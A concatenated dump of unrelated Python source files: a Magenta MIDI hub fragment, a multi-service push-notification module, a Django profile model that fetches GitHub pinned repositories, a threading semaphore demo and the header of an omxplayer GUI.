elif self._texture_type == TextureType.POLYPHONIC:
if msg.type == 'note_on' and msg.velocity > 0:
self._open_notes.add(msg.note)
elif (msg.type == 'note_off' or
(msg.type == 'note_on' and msg.velocity == 0)):
self._open_notes.discard(msg.note)
self._outport.send(msg)
elif self._texture_type == TextureType.MONOPHONIC:
assert len(self._open_notes) <= 1
if msg.type not in ['note_on', 'note_off']:
self._outport.send(msg)
elif ((msg.type == 'note_off' or
msg.type == 'note_on' and msg.velocity == 0) and
msg.note in self._open_notes):
self._outport.send(msg)
self._open_notes.remove(msg.note)
elif msg.type == 'note_on' and msg.velocity > 0:
if self._open_notes:
self._outport.send(
mido.Message('note_off', note=self._open_notes.pop()))
self._outport.send(msg)
self._open_notes.add(msg.note)
def start_capture(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Starts a MidiCaptor to compile incoming messages into a NoteSequence.
    If neither `stop_time` nor `stop_signal` is provided, the caller must
explicitly stop the returned capture thread. If both are specified, the one
that occurs first will stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The MidiCaptor thread.
"""
if self._texture_type == TextureType.MONOPHONIC:
captor_class = MonophonicMidiCaptor
else:
captor_class = PolyphonicMidiCaptor
captor = captor_class(qpm, start_time, stop_time, stop_signal)
with self._lock:
self._captors.append(captor)
captor.start()
return captor
def capture_sequence(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Compiles and returns incoming messages into a NoteSequence.
Blocks until capture stops. At least one of `stop_time` or `stop_signal`
must be specified. If both are specified, the one that occurs first will
stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The captured NoteSequence proto.
Raises:
MidiHubError: When neither `stop_time` nor `stop_signal` are provided.
"""
if stop_time is None and stop_signal is None:
raise MidiHubError(
'At least one of `stop_time` and `stop_signal` must be provided to '
'`capture_sequence` call.')
captor = self.start_capture(qpm, start_time, stop_time, stop_signal)
captor.join()
return captor.captured_sequence()
@concurrency.serialized
def wait_for_event(self, signal=None, timeout=None):
"""Blocks until a matching mido.Message arrives or the timeout occurs.
Exactly one of `signal` or `timeout` must be specified. Using a timeout
with a threading.Condition object causes additional delays when notified.
Args:
signal: A MidiSignal to use as a signal to stop waiting, or None.
timeout: A float timeout in seconds, or None.
Raises:
      MidiHubError: If neither or both of `signal` and `timeout` are specified.
"""
if (signal, timeout).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `timeout` must be provided to '
'`wait_for_event` call.')
if signal is None:
concurrency.Sleeper().sleep(timeout)
return
signal_pattern = str(signal)
cond_var = None
    for regex, cond_var in self._signals.items():
if regex.pattern == signal_pattern:
break
if cond_var is None:
cond_var = threading.Condition(self._lock)
self._signals[re.compile(signal_pattern)] = cond_var
cond_var.wait()
@concurrency.serialized
def wake_signal_waiters(self, signal=None):
"""Wakes all threads waiting on a signal event.
Args:
signal: The MidiSignal to wake threads waiting on, or None to wake all.
"""
for regex in list(self._signals):
if signal is None or regex.pattern == str(signal):
self._signals[regex].notify_all()
del self._signals[regex]
for captor in self._captors:
captor.wake_signal_waiters(signal)
@concurrency.serialized
def start_metronome(self, qpm, start_time, signals=None, channel=None):
"""Starts or updates the metronome with the given arguments.
Args:
qpm: The quarter notes per minute to use.
start_time: The wall time in seconds that the metronome is started on for
synchronization and beat alignment. May be in the past.
signals: An ordered collection of MidiSignals whose underlying messages
are to be output on the metronome's tick, cyclically. A None value can
be used in place of a MidiSignal to output nothing on a given tick.
channel: The MIDI channel to output ticks on.
"""
if self._metronome is not None and self._metronome.is_alive():
self._metronome.update(
qpm, start_time, signals=signals, channel=channel)
else:
self._metronome = Metronome(
self._outport, qpm, start_time, signals=signals, channel=channel)
self._metronome.start()
@concurrency.serialized
def stop_metronome(self, stop_time=0, block=True):
"""Stops the metronome at the given time if it is currently running.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until metronome is stopped.
"""
if self._metronome is None:
return
self._metronome.stop(stop_time, block)
self._metronome = None
def start_playback(self, sequence, start_time=time.time(),
allow_updates=False):
"""Plays the notes in aNoteSequence via the MIDI output port.
Args:
sequence: The NoteSequence to play, with times based on the wall clock.
start_time: The float time before which to strip events. Defaults to call
time. Events before this time will be sent immediately on start.
      allow_updates: A boolean specifying whether or not the player should
          allow the sequence to be updated and stay alive until `stop` is
          called.
Returns:
The MidiPlayer thread handling playback to enable updating.
"""
player = MidiPlayer(self._outport, sequence, start_time, allow_updates,
self._playback_channel, self._playback_offset)
with self._lock:
self._players.append(player)
player.start()
return player
@concurrency.serialized
def control_value(self, control_number):
"""Returns the most recently received value for the given control number.
Args:
control_number: The integer control number to return the value for, or
None.
Returns:
      The most recently received integer value for the given control number, or
None if no values have been received for that control.
"""
if control_number is None:
return None
return self._control_values.get(control_number)
def send_control_change(self, control_number, value):
"""Sends the specified control change message on the output port."""
self._outport.send(
mido.Message(
type='control_change',
control=control_number,
value=value))
@concurrency.serialized
def register_callback(self, fn, signal):
"""Calls `fn` at the next signal message.
The callback function must take exactly one argument, which will be the
message triggering the signal.
Survives until signal is called or the MidiHub is destroyed.
Args:
fn: The callback function to call, passing in the triggering message.
signal: A MidiSignal to use as a signal to call `fn` on the triggering
message.
"""
self._callbacks[re.compile(str(signal))].append(fn)
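# Illustrative sketch (not part of the original module): a minimal end-to-end
# use of MidiHub. The port names are assumptions; names that are not available
# ports will be opened as virtual ports.
def _example_hub(input_port='magenta_in', output_port='magenta_out'):
  """Captures eight seconds of monophonic input with a metronome running."""
  hub = MidiHub([input_port], [output_port], TextureType.MONOPHONIC)
  start = time.time()
  hub.start_metronome(qpm=120, start_time=start)
  captured = hub.capture_sequence(qpm=120, start_time=start, stop_time=start + 8)
  hub.stop_metronome()
  return captured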
|
notify_mtr.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import os
import re
import threading
import time
import urllib.parse
import json5 as json
import requests
from utils_env import get_file_path
# The original print function and a lock shared by the worker threads
_print = print
mutex = threading.Lock()
# Define a new print function
def print(text, *args, **kw):
"""
    Keep output ordered so that concurrent threads do not interleave their messages.
"""
with mutex:
_print(text, *args, **kw)
# Notification services
# fmt: off
push_config = {
    'HITOKOTO': False,  # enable Hitokoto (append a random quote)
    'BARK_PUSH': '',  # Bark IP or device key, e.g. https://api.day.app/DxHcxxxxxRxxxxxxcm/
    'BARK_ARCHIVE': '',  # whether Bark pushes are archived
    'BARK_GROUP': '',  # Bark push group
    'BARK_SOUND': '',  # Bark push sound
    'CONSOLE': True,  # print to the console
    'DD_BOT_SECRET': '',  # DingTalk bot DD_BOT_SECRET
    'DD_BOT_TOKEN': '',  # DingTalk bot DD_BOT_TOKEN
    'FSKEY': '',  # Feishu bot FSKEY
    'GOBOT_URL': '',  # go-cqhttp
    # push to a personal QQ: http://127.0.0.1/send_private_msg
    # push to a group:       http://127.0.0.1/send_group_msg
    'GOBOT_QQ': '',  # go-cqhttp target group or user
    # when GOBOT_URL is /send_private_msg, set user_id=<personal QQ>
    # when GOBOT_URL is /send_group_msg, set group_id=<QQ group>
    'GOBOT_TOKEN': '',  # go-cqhttp access_token
    'IGOT_PUSH_KEY': '',  # iGot aggregated push IGOT_PUSH_KEY
    'PUSH_KEY': '',  # ServerChan PUSH_KEY, works with both the legacy and Turbo versions
    'PUSH_PLUS_TOKEN': '',  # push+ (pushplus) WeChat push user token
    'PUSH_PLUS_USER': '',  # push+ (pushplus) WeChat push group code
    'QMSG_KEY': '',  # Qmsg QMSG_KEY
    'QMSG_TYPE': '',  # Qmsg QMSG_TYPE
    'QYWX_AM': '',  # WeCom (WeChat Work) application
    'QYWX_KEY': '',  # WeCom (WeChat Work) bot
    'TG_BOT_TOKEN': '',  # Telegram bot TG_BOT_TOKEN, e.g. 1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
    'TG_USER_ID': '',  # Telegram bot TG_USER_ID, e.g. 1434078534
    'TG_API_HOST': '',  # Telegram proxy API host
    'TG_PROXY_AUTH': '',  # Telegram proxy auth parameters
    'TG_PROXY_HOST': '',  # Telegram bot TG_PROXY_HOST
    'TG_PROXY_PORT': '',  # Telegram bot TG_PROXY_PORT
}
notify_function = []
# fmt: on
# First read dashboard variables or GitHub Actions runtime variables
for k in push_config:
if v := os.getenv(k):
push_config[k] = v
# Then read variables from the config file (these override environment variables)
CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.json5")
if os.path.exists(CONFIG_PATH):
print(f"通知配置文件存在:{CONFIG_PATH}。")
try:
for k, v in dict(
json.load(open(CONFIG_PATH, mode="r", encoding="utf-8"))
).items():
if k in push_config:
push_config[k] = v
except ValueError:
print(
f"错误:配置文件 {CONFIG_PATH} 格式不对,请在 https://verytoolz.com/json5-validator.html 中检查格式"
)
elif CONFIG_PATH:
print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!")
def bark(title: str, content: str) -> None:
"""
    Push a message via Bark.
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
    Push a message to the console.
"""
print(f"{title}\n\n" f"{content}")
def dingding_bot(title: str, content: str) -> None:
"""
    Push a message via a DingTalk bot.
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
    Push a message via a Feishu (Lark) bot.
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data, quote_keys=True)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
    Push a message via go-cqhttp.
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def iGot(title: str, content: str) -> None:
"""
    Push a message via iGot.
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
    Push a message via ServerChan (serverJ).
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
    Push a message via push+ (pushplus).
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data, quote_keys=True).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
    Push a message via Qmsg.
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
    Push a message via the WeCom (WeChat Work) app.
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
    if len(QYWX_AM_AY) not in (4, 5):
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
    # If media_id is not configured, send as plain text by default
if not media_id:
message = title + "\n\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
        send_msges = bytes(json.dumps(send_values), "utf-8")
        response = requests.post(send_url, send_msges)
        response = response.json()
        return response["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
        send_msges = bytes(json.dumps(send_values), "utf-8")
        response = requests.post(send_url, send_msges)
        response = response.json()
        return response["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
通过 企业微信机器人 推送消息。
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
        url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
使用 telegram 机器人 推送消息。
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
获取一条一言。
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
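# Uncaught exceptions raised inside the push threads are routed here: network
# failures (requests.exceptions.RequestException) are reported as a warning,
# everything else is passed on to the default threading excepthook.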
def excepthook(args, /):
if issubclass(args.exc_type, requests.exceptions.RequestException):
print(
f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}"
)
else:
global default_hook
default_hook(args)
default_hook = threading.excepthook
threading.excepthook = excepthook
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
models.py
|
from django.db import models
from django.contrib.auth.models import User
from io import BytesIO
from PIL import Image
from django.core.files import File
import requests
from threading import Thread
from posts import models as post_models
def compress(image):
im = Image.open(image)
if im.mode in ("RGBA","P"):
im = im.convert("RGB")
im_io = BytesIO()
im = im.resize((150,150))
im.save(im_io, 'JPEG', quality=60)
new_image = File(im_io, name=image.name)
return new_image
class Profile(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
name = models.CharField(max_length=80)
email = models.EmailField()
location = models.CharField(max_length=255)
profile_picture = models.ImageField(upload_to='media/images/profile_picture', max_length=500)
bio = models.TextField()
website = models.URLField(blank=True)
followers = models.ManyToManyField('Profile',related_name='followed_by')
following = models.ManyToManyField('Profile')
gitlab_url = models.URLField(blank=True)
behance_url = models.URLField(blank=True)
instagram_url = models.URLField(blank=True)
github_url = models.URLField(blank=True)
def __str__(self):
return str(self.user.username)
def save(self, *args, **kwargs):
        # Pass the callable and its args separately; GithubTask(self.user) would run synchronously here.
        t = Thread(target=GithubTask, args=(self.user,))
t.start()
self.profile_picture = compress(self.profile_picture)
super().save(*args, **kwargs)
def get_post_count(self):
posts = post_models.Post.objects.filter(author=self.user)
return posts.count()
class GitHubRepo(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
name = models.CharField(max_length=255)
description = models.TextField(blank=True)
top_language = models.CharField(max_length=255,blank=True)
stars = models.IntegerField(blank=True)
fork = models.BooleanField(default=False)
url = models.URLField(blank=True)
def __str__(self) -> str:
return str(self.name)
class GitHubProfile(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
repos = models.ManyToManyField(GitHubRepo)
def __str__(self) -> str:
return str(self.user)
def GithubTask(user):
r = requests.get(f'https://gh-pinned-repos-5l2i19um3.vercel.app/?username={user}')
response = r.json()
gh = GitHubProfile.objects.filter(user=user)
if not gh.exists():
for i in response:
name = i['repo']
description = i['description']
try:
language = i['language']
except KeyError:
language = ''
stars = i['stars']
url = i['link']
gh_repo = GitHubRepo(user=user,
name=name,
description=description,
top_language=language,
stars=stars,
fork=False,
url=url
)
gh_repo.save()
gh_profile = GitHubProfile(user=user)
gh_profile.save()
gh_repos = GitHubRepo.objects.filter(user=user)
for i in gh_repos:
gh_profile.repos.add(i)
gh_profile.save()
for i in gh_repos:
req = requests.get(f'https://api.github.com/repos/{i.user.username}/{i.name}')
res = req.json()
        if res['fork']:
i.fork = True
i.save()
|
semaphore_objects_01_bounded.py
|
import threading
from time import sleep
N_MAX_CLIENTS_LOGGED_SIMULTANEOUSLY: int = 3
N_CLIENTS: int = 15
semaphore = threading.BoundedSemaphore(value=N_MAX_CLIENTS_LOGGED_SIMULTANEOUSLY)
def client() -> None:
semaphore.acquire()
    print(f'\n{threading.current_thread().name} -> logged in -> N ACTIVE THREADS: {threading.active_count()}')
sleep(3)
print(f'\n{threading.current_thread().name} -> logging out')
sleep(1)
semaphore.release()
for i in range(N_CLIENTS):
threading.Thread(name=f'client_{i}', target=client).start()
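# A minimal alternative sketch (not used by the demo loop above): threading
# semaphores also support the context-manager protocol, so the explicit
# acquire()/release() pair can be written as a `with` block, which releases
# the slot even if the client body raises an exception.
def client_using_with() -> None:
    with semaphore:
        print(f'\n{threading.current_thread().name} -> logged in -> N ACTIVE THREADS: {threading.active_count()}')
        sleep(3)
        print(f'\n{threading.current_thread().name} -> logging out')
        sleep(1)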
|
tboplayer.py
|
"""
A GUI interface using jbaiter's pyomxplayer to control omxplayer
INSTALLATION
***
* TBOPlayer requires avconv, youtube-dl, and also the python libraries requests, gobject2, gtk2, pexpect and ptyprocess to be installed in order to work.
*
* -------------------------
*
* To install TBOPlayer and all required libraries, you can simply use the following command from tboplayer directory:
*
* chmod +x setup.sh
* ./setup.sh
*
* -------------------------
*
* See README.md file for more details on installation
*
OPERATION
Menus
====
Track - add tracks (for selecting multiple tracks, hold ctrl when clicking) or directories or URLs, edit or remove tracks from the current playlist
Playlist - save the current playlist or open a saved one or load youtube playlist
OMX - display the track information for the last played track (needs to be enabled in options)
Options -
Audio Output - play sound to hdmi or local output, auto does not send an audio option to omxplayer.
Mode - play the Single selected track, Repeat the single track, rotate around the Playlist starting from the selected track, randomly play a track from the Playlist.
Initial directory for tracks - where Add Track starts looking.
Initial directory for playlists - where Open Playlist starts looking
Enable subtitles
OMXPlayer location - path to omxplayer binary
OMXplayer options - add your own (no validation so be careful)
Download from Youtube - defines whether to download video and audio or audio only from Youtube (other online video services will always be asked for "video and audio")
Download actual media URL [when] - defines when to extract the actual media from the given URL, either upon adding the URL or when playing it
Youtube video quality - lets you choose between "small", "medium" and "high" qualities (Youtube only feature)
youtube-dl location - path to youtube-dl binary
Start/End track paused - Pauses the track both at the beginning and at the end of the track
Autoplay on start up - If TBOPlayer has just been opened and has some file in the playlist, automatically start playing the first file in the list
Forbid windowed mode - if enabled will make videos always show in full screen, disabling the video window mode and video progress bar - useful if you're using tboplayer through a remote desktop
Debug - prints some debug text to the command line
* See README.md file for more details on operation in the OPERATION section
TODO (maybe)
--------
sort out black border around some videos
gapless playback, by running two instances of pyomxplayer
read and write m3u and pls playlists
PROBLEMS
---------------
I think I might have fixed this, but two tracks may play at the same time if you use the controls quickly; you may need to SSH in from another computer and use top -upi and k to kill the omxplayer.bin
"""
from options import *
from ytdl import *
from omxplayer import *
from playlist import *
from dnd import *
from dbusinterface import *
from htmlparsers import *
from scrolledframe import *
from debugging import *
from threading import Thread
from time import sleep
from pprint import ( pformat, pprint )
from random import randint
from math import log10
from magic import from_file
from youtubesearchpython import SearchVideos
import gettext
import json
import re
import string
import sys
from Tkinter import *
from ttk import ( Progressbar, Style, Sizegrip )
from gtk.gdk import ( screen_width, screen_height )
import Tkinter as tk
import tkFileDialog
import tkMessageBox
import tkSimpleDialog
import tkFont
options = Options()
try:
gettext.translation('tboplayer', localedir=sys.path[0] + '/locale', languages=[options.lang]).install()
except:
_ = lambda x:x
#**************************
# TBOPLAYER CLASS
# *************************
class TBOPlayer:
# regular expression patterns
RE_RESOLUTION = re.compile("^([0-9]+)x([0-9]+)$")
RE_COORDS = re.compile("^([\+-][0-9]+)([\+-][0-9]+)$")
_SUPPORTED_MIME_TYPES = ('video/x-msvideo', 'video/quicktime', 'video/mp4', 'video/x-flv', 'video/x-matroska', 'audio/x-matroska',
'video/3gpp', 'audio/x-aac', 'video/h264', 'video/h263', 'video/x-m4v', 'audio/midi',
'audio/mid', 'audio/vnd.qcelp', 'audio/mpeg', 'video/mpeg', 'audio/rmf', 'audio/x-rmf',
'audio/mp4', 'video/mj2', 'audio/x-tta', 'audio/tta', 'application/mp4', 'audio/ogg',
'video/ogg', 'audio/wav', 'audio/wave' ,'audio/x-pn-aiff', 'audio/x-pn-wav', 'audio/x-wav',
'audio/flac', 'audio/x-flac', 'video/h261', 'application/adrift', 'video/3gpp2', 'video/x-f4v',
'application/ogg', 'audio/mpeg3', 'audio/x-mpeg-3', 'audio/x-gsm', 'audio/x-mpeg', 'audio/mod',
'audio/x-mod', 'video/x-ms-asf', 'audio/x-pn-realaudio', 'audio/x-realaudio' ,'video/vnd.rn-realvideo', 'video/fli',
'video/x-fli', 'audio/x-ms-wmv', 'video/avi', 'video/msvideo', 'video/m4v', 'audio/x-ms-wma',
'application/octet-stream', 'application/x-url', 'text/url', 'text/x-url', 'application/vnd.rn-realmedia', 'video/webm',
'audio/webm', 'audio/vnd.rn-realaudio', 'audio/x-pn-realaudio', 'audio/x-realaudio', 'audio/aiff', 'audio/x-aiff')
YTDL_MSGS = (_("Problem retreiving content. Do you have up-to-date dependencies?"),
_("Problem retreiving content. Content may be copyrighted or the link may be invalid."),
_("Problem retrieving content. Content may have been truncated."))
YTDL_WAIT_TAG = "[" + _("wait") + "]"
progress_bar_total_steps = 200
progress_bar_step_rate = 0
volume_max = 60
volume_normal_step = 40
volume_critical_step = 49
# ***************************************
# # PLAYING STATE MACHINE
# ***************************************
"""self. play_state controls the playing sequence, it has the following values.
I am not entirely sure the startign and ending states are required.
- omx_closed - the omx process is not running, omx process can be initiated
- omx_starting - omx process is running but is not yet able to receive commands
- omx_playing - playing a track, commands can be sent
- omx_ending - omx is doing its termination, commands cannot be sent
"""
def init_play_state_machine(self):
self._OMX_CLOSED = "omx_closed"
self._OMX_STARTING = "omx_starting"
self._OMX_PLAYING = "omx_playing"
self._OMX_ENDING = "omx_ending"
self._YTDL_CLOSED = "ytdl_closed"
self._YTDL_STARTING = "ytdl_starting"
self._YTDL_WORKING = "ytdl_working"
self._YTDL_ENDING = "ytdl_ending"
# what to do next signals
self.break_required_signal=False # signal to break out of Repeat or Playlist loop
self.play_previous_track_signal = False
